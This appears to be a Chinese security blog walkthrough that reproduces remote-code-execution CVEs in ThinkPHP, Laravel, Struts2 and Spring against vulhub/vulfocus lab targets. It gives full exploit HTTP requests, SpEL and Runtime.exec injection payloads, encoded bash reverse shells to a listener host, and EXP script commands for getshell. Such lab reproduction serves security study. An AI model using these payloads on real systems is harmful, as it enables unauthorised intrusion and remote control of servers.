服務(wù)攻防-框架安全&CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP
概述
中間件及框架列表:
IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,F(xiàn)lask,jQuery 等
1、開發(fā)框架-PHP-Laravel-Thinkphp
2、開發(fā)框架-Javaweb-St2-Spring
3、開發(fā)框架-Python-django-Flask
4、開發(fā)框架-Javascript-Node.js-JQuery
常見語言開發(fā)框架:
PHP:Thinkphp Laravel YII CodeIgniter CakePHP Zend 等
JAVA:Spring MyBatis Hibernate Struts2 Springboot 等
Python:Django Flask Bottle Turbobars Tornado Web2py 等
Javascript:Vue.js Node.js Bootstrap JQuery Angular 等
PHP-開發(fā)框架安全-Thinkphp&Laravel
詳解:Thinkphp詳解
詳解:Laravel詳解
ThinkPHP是一個(gè)快速、兼容而且簡單的輕量級(jí)國產(chǎn)PHP開發(fā)框架,誕生于2006年初,原名FCS,2007年元旦正式更名為ThinkPHP,遵循Apache2開源協(xié)議發(fā)布,從Struts結(jié)構(gòu)移植過來并做了改進(jìn)和完善,同時(shí)也借鑒了國外很多優(yōu)秀的框架和模式,使用面向?qū)ο蟮拈_發(fā)結(jié)構(gòu)和MVC模式,融合了Struts的思想和TagLib(標(biāo)簽庫)、RoR的ORM映射和ActiveRecord模式。
Laravel是一套簡潔、優(yōu)雅的PHP Web開發(fā)框架(PHP Web Framework)。它可以從面條一樣雜亂的代碼中解脫出來;它可以構(gòu)建網(wǎng)絡(luò)APP,而且每行代碼都可以簡潔、富于表達(dá)力。
安全問題:
Thinkphp-3.X RCE
Thinkphp-5.X RCE
CVE-2021-3129 RCE
…
特征:
利用前可先判斷其開發(fā)框架,通過瀏覽器插件,或者數(shù)據(jù)包信息內(nèi)容等進(jìn)行判斷是什么開發(fā)框架。判斷方式很多。
"十年磨一劍"是ThinkPHP的特征之一,出現(xiàn)圖標(biāo),倒立微笑的笑臉也是特征之一。
…
漏洞復(fù)現(xiàn)
Thinkphp-3.X RCE
靶場(chǎng):vulfocus
開啟環(huán)境:
漏洞利用:
可直接放入到工具當(dāng)中進(jìn)行檢測(cè),一鍵利用即可
命令執(zhí)行RCE:
payload:
http://192.168.100.134:24566//?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/23_10_26.log
查看:
還可以進(jìn)行g(shù)etshell,找到路徑,一鍵getshell:
直接可getshell:
然后使用蟻劍連接即可:
成功連接:
日志泄露:
Payload:
http://192.168.100.134:24566//Application/Runtime/Logs/Admin/23_10_26.log
查看:
工具在github搜索即可,有很多,遇到不好用的也正常。(利用簡單[工具點(diǎn)一點(diǎn)就可以~],發(fā)現(xiàn)該系列漏洞,危害較大。)以下也是同理。
Thinkphp-5.X RCE
ThinkPHP是在中國使用非常廣泛的PHP開發(fā)框架。在其版本 5 中,由于框架錯(cuò)誤地處理控制器名稱,如果網(wǎng)站未啟用強(qiáng)制路由(這是默認(rèn)),它可以執(zhí)行任何方法,從而導(dǎo)致 RCE 漏洞。
靶場(chǎng):vulhub
參考:Thinkphp5 5.0.22/5.1.29 遠(yuǎn)程執(zhí)行代碼漏洞
開啟環(huán)境:
訪問靶場(chǎng):
漏洞利用:
利用方式和以上一致,直接利用成熟的工具即可。
利用前可先判斷其開發(fā)框架,通過瀏覽器插件,或者數(shù)據(jù)包信息內(nèi)容等進(jìn)行判斷是什么開發(fā)框架。
"十年磨一劍"是ThinkPHP的特征之一,微笑的笑臉也是特征。
直接將url信息內(nèi)容,拋到工具當(dāng)中:
輸入利用的漏洞編號(hào),利用即可:
命令執(zhí)行RCE:
getshell:
通過蟻劍進(jìn)行連接:
連接添加成功:
Laravel框架安全問題- CVE-2021-3129 RCE
詳解:Laravel詳解
Laravel是一套簡潔、優(yōu)雅的PHP Web開發(fā)框架(PHP Web Framework)。它可以從面條一樣雜亂的代碼中解脫出來;它可以構(gòu)建網(wǎng)絡(luò)APP,而且每行代碼都可以簡潔、富于表達(dá)力。
靶場(chǎng):vulfocus
漏洞描述:
Laravel是一套簡潔、開源的PHP Web開發(fā)框架,旨在實(shí)現(xiàn)Web軟件的MVC架構(gòu)。 Laravel開啟了Debug模式時(shí),由于Laravel自帶的Ignition 組件對(duì)file_get_contents()和file_put_contents()函數(shù)的不安全使用,攻擊者可以通過發(fā)起惡意請(qǐng)求,構(gòu)造惡意Log文件等方式觸發(fā)Phar反序列化,最終造成遠(yuǎn)程代碼執(zhí)行
開啟靶場(chǎng):
訪問:
漏洞利用:
github搜索漏洞編號(hào)CVE-2021-3129,查找相關(guān)exp下載利用即可
exp地址:CVE-2021-3129EXP
python laravel-CVE-2021-3129-EXP.py http://192.168.100.134:29972
直接利用即可,getshell:
哥斯拉鏈接即可。
利用相對(duì)簡單,使用現(xiàn)成熟的腳步或工具即可。github上搜索即可。
JAVAWEB-開發(fā)框架安全-Spring&Struts2
Struts2框架安全
Struts2介紹:
詳解:Struts2框架
Struts2框架是一個(gè)用于開發(fā)Java EE網(wǎng)絡(luò)應(yīng)用程序的開放源代碼網(wǎng)頁應(yīng)用程序架構(gòu)。它利用并延伸了Java Servlet API,鼓勵(lì)開發(fā)者采用MVC架構(gòu)。Struts2以WebWork優(yōu)秀的設(shè)計(jì)思想為核心,吸收了Struts框架的部分優(yōu)點(diǎn),提供了一個(gè)更加整潔的MVC設(shè)計(jì)模式實(shí)現(xiàn)的Web應(yīng)用程序框架。
框架特點(diǎn):
1、一般st2框架開發(fā)的網(wǎng)站,url上會(huì)有.action或.do后綴的文件名,比如:
http://192.168.xx.xx/integration/editGangster.action
http://192.168.xxx.xxx:8080/login.action
…
方法1可能不準(zhǔn)確,因?yàn)閟pring框架或jboss系統(tǒng)有時(shí)候也存在.do結(jié)尾的文件名。
2、在相關(guān)接口追加actionErrors參數(shù),通過網(wǎng)站頁面的回顯錯(cuò)誤消息來判斷。
3、默認(rèn)情況下,st2框架中存在http://192.168.xXx/struts/webconsole.html這個(gè)默認(rèn)文件。
4、抓包,看包中Content–Type字段的開頭是否形如%{#x=[‘XXX’]
方法4僅限于st2-045框架漏洞
此Struts2系列漏洞現(xiàn)有成熟工具,判別出特征,直接利用即可。
較新的漏洞可能工具不支持。
漏洞復(fù)現(xiàn)
以struts2系列之一為例:
S2-009 遠(yuǎn)程執(zhí)行代碼漏洞
靶場(chǎng):vulhub
參考:s2-009
開啟環(huán)境:
訪問:
發(fā)現(xiàn)明顯的struts2特征
直接放到工具當(dāng)中進(jìn)行檢測(cè):
一鍵利用,命令執(zhí)行:
工具可在github上搜索,有很多。不排除有不好用的。
CVE-2017-5638(struts2-045 遠(yuǎn)程代碼執(zhí)行)
漏洞復(fù)現(xiàn):struts2-045 遠(yuǎn)程代碼執(zhí)行漏洞CVE-2017-5638
CVE-2020-17530 代碼執(zhí)行
struts2 代碼執(zhí)行 (CVE-2020-17530)
描述:
Struts2是一個(gè)基于MVC設(shè)計(jì)模式的Web應(yīng)用框架,它本質(zhì)上相當(dāng)于一個(gè)servlet,在MVC設(shè)計(jì)模式中,Struts2作為控制器(Controller)來建立模型與視圖的數(shù)據(jù)交互。 在特定的環(huán)境下,遠(yuǎn)程攻擊者通過構(gòu)造 惡意的OGNL表達(dá)式 ,可造成任意代碼執(zhí)行
靶場(chǎng):vulfocus
開啟環(huán)境:
訪問:
可使用工具檢測(cè):
使用EXP腳本也可以,漏洞比較新,可能一些工具不支持,無法檢測(cè),利用。
github上搜索漏洞編號(hào),使用即可。
工具地址:CVE-2020-17530EXP
工具使用:
python struts2-061-poc.py http://192.168.100.134:34952 "執(zhí)行的命令"
反彈shell:
python2 S2-061-shell.py http://192.168.100.134:34952
反彈成功
CVE-2021-31805 遠(yuǎn)程代碼執(zhí)行
遠(yuǎn)程代碼執(zhí)行漏洞-CVE-2021-31805
影響范圍:Apache Struts 2.0.0-2.5.29
靶場(chǎng):vulfocus
開啟并訪問。
漏洞利用EXP,可直接去github上搜索編號(hào),下載利用即可。
EXP地址:s2-062EXP
修復(fù):升級(jí)即可。
JAVAWEB-開發(fā)框架安全-Spring框架
spring框架安全
Spring框架是由于軟件開放復(fù)雜性而創(chuàng)建的??蚣芟掠泻芏嘧臃种?,披露了很多安全問題。
特征:小綠葉圖標(biāo)
spring框架介紹:
詳解:spring開源框架
Spring框架是一個(gè)開放源代碼的J2EE應(yīng)用程序框架,由Rod Johnson發(fā)起,是針對(duì)bean的生命周期進(jìn)行管理的輕量級(jí)容器(lightweight container)。 Spring解決了開發(fā)者在J2EE開發(fā)中遇到的許多常見的問題,提供了功能強(qiáng)大IOC、AOP及Web MVC等功能。Spring可以單獨(dú)應(yīng)用于構(gòu)筑應(yīng)用程序,也可以和Struts、Webwork、Tapestry等眾多Web框架組合使用,并且可以與 Swing等桌面應(yīng)用程序AP組合。因此, Spring不僅僅能應(yīng)用于J2EE應(yīng)用程序之中,也可以應(yīng)用于桌面應(yīng)用程序以及小應(yīng)用程序之中。Spring框架主要由七部分組成,分別是 Spring Core、 Spring AOP、 Spring ORM、 Spring DAO、Spring Context、 Spring Web和 Spring Web MVC。
安全問題:
CVE-2017-4971
CVE-2018-1273
CVE-2022-22947
CVE-2022-22963
…
漏洞復(fù)現(xiàn)
Spring Data Commons 遠(yuǎn)程命令執(zhí)行漏洞(CVE-2018-1273)
介紹:
Spring Data 項(xiàng)目的目的是為了簡化構(gòu)建基于 Spring 框架應(yīng)用的數(shù)據(jù)訪問計(jì)數(shù),包括非關(guān)系數(shù)據(jù)庫、Map-Reduce 框架、云數(shù)據(jù)服務(wù)等等;另外也包含對(duì)關(guān)系數(shù)據(jù)庫的訪問支持。
Spring Data是一個(gè)用于簡化數(shù)據(jù)庫訪問,并支持云服務(wù)的開源框架,Spring Data Commons是Spring Data下所有子項(xiàng)目共享的基礎(chǔ)框架。Spring Data Commons 在2.0.5及以前版本中,存在一處SpEL表達(dá)式注入漏洞,攻擊者可以注入惡意SpEL表達(dá)式以執(zhí)行任意命令。
靶場(chǎng):vulhub
開啟環(huán)境:
訪問:
特征:小綠葉圖標(biāo)
注冊(cè)用戶信息:
當(dāng)注冊(cè)用戶時(shí),burp抓包:
修改數(shù)據(jù)包信息
payload:
......
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=
數(shù)據(jù)包內(nèi)容:
POST /users?page=&size=5 HTTP/1.1
Host: 192.168.100.134:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 uacq
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Origin: http://192.168.100.134:8080
Connection: close
Referer: http://192.168.100.134:8080/users?page=0&size=5
Upgrade-Insecure-Requests: 1
sec-ch-ua-platform: "macOS"
sec-ch-ua: "Google Chrome";v="112", "Chromium";v="112", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /123.txt")]=&password=&repeatedPassword=
進(jìn)入靶場(chǎng),驗(yàn)證是否創(chuàng)建成功:
//查看環(huán)境id
docker ps
//進(jìn)入環(huán)境
docker exec -it 環(huán)境id /bin/bash
創(chuàng)建成功:
反彈shell:
細(xì)節(jié)問題:需要URL編碼
先將反彈shell命令進(jìn)行base64編碼
sh -i >& /dev/tcp/192.168.100.1/8888 0>&1
base64編碼:
bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}
數(shù)據(jù)包當(dāng)中觀察:
content-type的值有urlencode,所以可能會(huì)進(jìn)行編碼才行。
編碼原因:請(qǐng)求頭部的信息或方式的原因,需要編碼。
將反彈shell命令URL編碼后,再次發(fā)送:
成功反彈shell,并執(zhí)行命令:
Spring WebFlow 遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2017-4971)
詳解:Spring Web Flow詳解
pring Web Flow (SWF) 是Spring Framework的一個(gè)脫離模塊。這個(gè)模塊是Spring Web應(yīng)用開發(fā)模塊棧的一部分,Spring Web包含Spring MVC。Spring Web Flow 的目標(biāo)是成為管理Web應(yīng)用頁面流程的最佳方案。當(dāng)你的應(yīng)用需要復(fù)雜的導(dǎo)航控制,例如向?qū)?,在一個(gè)比較大的事務(wù)過程中去指導(dǎo)用戶經(jīng)過一連串的步驟的時(shí)候,SWF將會(huì)是一個(gè)功能強(qiáng)大的控制器。
靶場(chǎng):vulhub
參考:Spring WebFlow 漏洞復(fù)現(xiàn)-CVE-2017-4971
Spring WebFlow 是一個(gè)適用于開發(fā)基于流程的應(yīng)用程序的框架(如購物邏輯),可以將流程的定義和實(shí)現(xiàn)流程行為的類和視圖分離開來。在其 2.4.x 版本中,如果我們控制了數(shù)據(jù)綁定時(shí)的field,將導(dǎo)致一個(gè)SpEL表達(dá)式注入漏洞,最終造成任意命令執(zhí)行。
開啟環(huán)境:
訪問web界面:
接下來訪問http://your-ip:8080/login
,用頁面左邊給出的任意一個(gè)賬號(hào)/密碼登錄系統(tǒng):
然后訪問id為1的酒店http://your-ip:8080/hotels/1
,點(diǎn)擊預(yù)訂按鈕“Book Hotel”,填寫相關(guān)信息后點(diǎn)擊“Process”(從這一步,其實(shí)WebFlow就正式開始了):
下一步:
下一步:
使用burp進(jìn)行抓包:
此時(shí)抓包,抓到一個(gè)POST數(shù)據(jù)包,我們向其中添加一個(gè)字段(也就是反彈shell的POC)
獲取的數(shù)據(jù)包:
修改后數(shù)據(jù)包添加數(shù)據(jù)內(nèi)容:
payload:
//_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/攻擊端ip/監(jiān)聽端口 0>&1")).start()=vulhub
......
_eventId_confirm=&_csrf=96117c67-2c77-4054-970a-d2644c9be1f2&_(new java.lang.ProcessBuilder("bash","-c","%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%30%30%2e%31%2f%38%38%38%38%20%30%3e%26%31")).start()=vulhub
//注意反彈shell命令進(jìn)行url編碼,否則無法反彈
進(jìn)行URL編碼:
反彈成功:
Spring Cloud Function SpEL表達(dá)式注入 (CVE-2022-22963)
詳解:spring cloud詳解
Spring Cloud Function提供了一個(gè)通用模型,用于在各種平臺(tái)上部署基于函數(shù)的軟件,包括像Amazon AWS Lambda這樣的FaaS(功能即服務(wù))平臺(tái)。
靶場(chǎng):vulhub
參考:CVE-2022-22963漏洞復(fù)現(xiàn)
開啟環(huán)境:
訪問web界面:
服務(wù)器啟動(dòng)后,執(zhí)行您可以將用戶輸入轉(zhuǎn)換為大寫。
命令:curl http://your-ip:8080/uppercase -H "Content-Type: text/plain" --data-binary test
抓取數(shù)據(jù)包:
請(qǐng)求標(biāo)頭中有一個(gè) SpEL 表達(dá)式注入。
添加內(nèi)容:
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("需要執(zhí)行的命令")
//完整數(shù)據(jù)包:
POST /functionRouter HTTP/1.1
Host: 192.168.100.134:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=AEC501EC3F7F15C42686C87B98EB23AC
DNT: 1
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/success")
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
asdasdasdd
成功執(zhí)行:
驗(yàn)證:
docker-compose exec spring /bin/bash
反彈shell:
成功反彈
Spring Cloud Gateway Actuator API SpEL 表達(dá)式注入 (CVE-2022-22947)
介紹:
SpringCloud GateWay 詳解
Spring Cloud Gateway是Spring Cloud生態(tài)系統(tǒng)中的一部分,它是一個(gè)基于Spring Framework 5,Spring Boot 2和Project Reactor等技術(shù)開發(fā)的全新的API網(wǎng)關(guān)服務(wù)器。它旨在提供一種簡單而有效的方式來路由到API,提供過濾器,以及在執(zhí)行請(qǐng)求和響應(yīng)之間的操作。
Spring Cloud Gateway 提供了一個(gè)庫,用于在 Spring WebFlux 之上構(gòu)建 API 網(wǎng)關(guān)。
在 3.1.0 和 3.0.6 之前版本中使用 Spring Cloud Gateway 的應(yīng)用程序,在啟用、暴露和不安全網(wǎng)關(guān)執(zhí)行器端點(diǎn)時(shí)容易受到代碼注入攻擊。遠(yuǎn)程攻擊者可發(fā)出惡意構(gòu)建的請(qǐng)求,允許在遠(yuǎn)程主機(jī)上任意遠(yuǎn)程執(zhí)行。
靶場(chǎng):vulhub
參考:CVE-2022-22947漏洞復(fù)現(xiàn)
開啟環(huán)境:
訪問web界面:
第一步,發(fā)送以下請(qǐng)求以添加包含惡意 SpEL 表達(dá)式的路由器:
//發(fā)送post請(qǐng)求,進(jìn)行抓包:
//數(shù)據(jù)包內(nèi)容:
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.100.134:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=AEC501EC3F7F15C42686C87B98EB23AC
DNT: 1
Connection: close
Content-Type: application/json
Content-Length: 329
{
"id": "hacktest",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
執(zhí)行后:
然后,刷新網(wǎng)關(guān)。
SpEL 表達(dá)式將在此步驟中執(zhí)行:
//數(shù)據(jù)包內(nèi)容:
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.100.134:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=AEC501EC3F7F15C42686C87B98EB23AC
DNT: 1
Connection: close
Content-Type: application/json
Content-Length: 329
{
"id": "hacktest",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
執(zhí)行后:
第三,發(fā)送以下請(qǐng)求,進(jìn)行命令執(zhí)行:
注意為:請(qǐng)求方式為GET請(qǐng)求
//請(qǐng)求數(shù)據(jù)包內(nèi)容:
GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.100.134:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=AEC501EC3F7F15C42686C87B98EB23AC
DNT: 1
Connection: close
Content-Type: application/json
Content-Length: 329
{
"id": "hacktest",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
最后,發(fā)送一個(gè)刪除請(qǐng)求來刪除我們的惡意路由器:
DELETE /actuator/gateway/routes/hacktest HTTP/1.1
......
發(fā)送數(shù)據(jù)包即可:
再次刷新網(wǎng)關(guān):
POST /actuator/gateway/refresh HTTP/1.1
......
方式二:使用工具直接利用
工具地址:SpringBootExploit
將目標(biāo)URL拋到工具當(dāng)中去,檢測(cè):
直接利用即可
根據(jù)工具,經(jīng)過測(cè)試驗(yàn)證,命令執(zhí)行:
端點(diǎn)信息:文章來源:http://www.zghlxwxcb.cn/news/detail-715615.html
文章來源地址http://www.zghlxwxcb.cn/news/detail-715615.html
到了這里,關(guān)于框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!